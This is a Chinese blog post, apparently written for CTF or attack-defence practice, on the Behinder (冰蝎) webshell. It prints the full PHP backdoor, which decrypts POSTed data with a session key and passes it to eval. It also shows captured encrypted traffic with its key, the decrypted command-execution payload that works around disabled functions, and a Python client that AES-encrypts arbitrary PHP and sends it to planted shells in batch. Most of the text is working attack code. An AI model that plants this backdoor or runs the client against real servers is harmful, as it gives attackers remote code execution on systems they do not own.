冰蝎批量脚本连接

冰蝎后门shell.php

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl')) 
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

冰蝎流量分析

冰蝎客户端连上之后先请求两次pass,用第二次的key,使用命令执行发送的数据包(捕获的key:8be307f657489a41)

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

回显

i90ywWzkOhPc1RGlN8Bx8vAZYbAQbAy440de1SoVNPbL80X28IR4Yxaz6S4oBzBNZUkBP9UX4R1a0m0vazZHpA==

加密的post数据 会经过

$post=openssl_decrypt($post, "AES128", $key);

用key解密成这种格式的流量

assert|eval(base64_decode('xxxx....'));

base64解密之后

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;

    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }
}$cmd="cat /flag";
main($cmd);

批量脚本

参考网上的脚本,用python实现了aes,代替了php -r openssl

import base64
import codecs
import requests
from Crypto.Cipher import AES
# import os

session = requests.Session()

def padding_zero(key) -> bytes:
    output = list(key)
    while len(output) % 16:
        output.append('\x00')
    return ''.join(output).encode()

def padding_pkcs5(msg) -> bytes:
    if isinstance(msg, str):
        msg = msg.encode()
    if len(msg) == 0x10:
        return msg + b'\x10' * 0x10
    return msg + (
        0x10 - len(msg) % 0x10) * chr(0x10 - len(msg) % 0x10).encode()

def aes_encrypt(msg, key) -> str:
    key=padding_zero(key)
    enc = AES.new(key, AES.MODE_CBC, b'\x00' * 16)
    return base64.b64encode(enc.encrypt(padding_pkcs5(msg))).decode()

# def aes_encrypt_os(text,key):
#     command = "php -r \"echo @openssl_encrypt(\\\"{}\\\", 'AES128', '{}');\"".format(text,key)
#     str =os.popen(command).readline()
#     return str

def get_key(url):
    Getparams={"pass":"1"}
    key = session.get(url,params=Getparams).content
    key = str(key, encoding = "utf-8")
    return key

def main_exec(url,command,key):
    command = bytes(command, encoding = "utf8")
    command_b64= str(base64.b64encode(command), encoding = "utf-8")

    command_eval="assert|eval(base64_decode('{}'));".format(command_b64)
    postdata=aes_encrypt(command_eval,key)

    res=session.post(url,data=postdata).content
    return res

def main_exec_encode(url,command,key):
    command2 = "ob_start();"+command+"$flag = ob_get_contents();ob_end_clean();for($i=0;$i<10;$i++){$flag=bin2hex($flag);$flag=base64_encode($flag);}print($flag);"
    command2 = bytes(command2, encoding = "utf8")

    command_b64 = str(base64.b64encode(command2), encoding = "utf-8")
    command_eval="assert|eval(base64_decode('{}'));".format(command_b64)
    postdata=aes_encrypt(command_eval,key)

    res=session.post(url,data=postdata).content

    for i in range(10):
        res = base64.b64decode(res)
        res = codecs.decode(res,"hex")
    return res

if __name__ == "__main__":
    urls = []
    url = "http://url/shell3.php"
    command = "system('cat /flag');"

    key = get_key(url)
    flag = main_exec(url,command,key)
    flag2 = main_exec_encode(url,command,key)
    print(flag)
    print(flag2)

文章作者: hh
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 hh !
  目录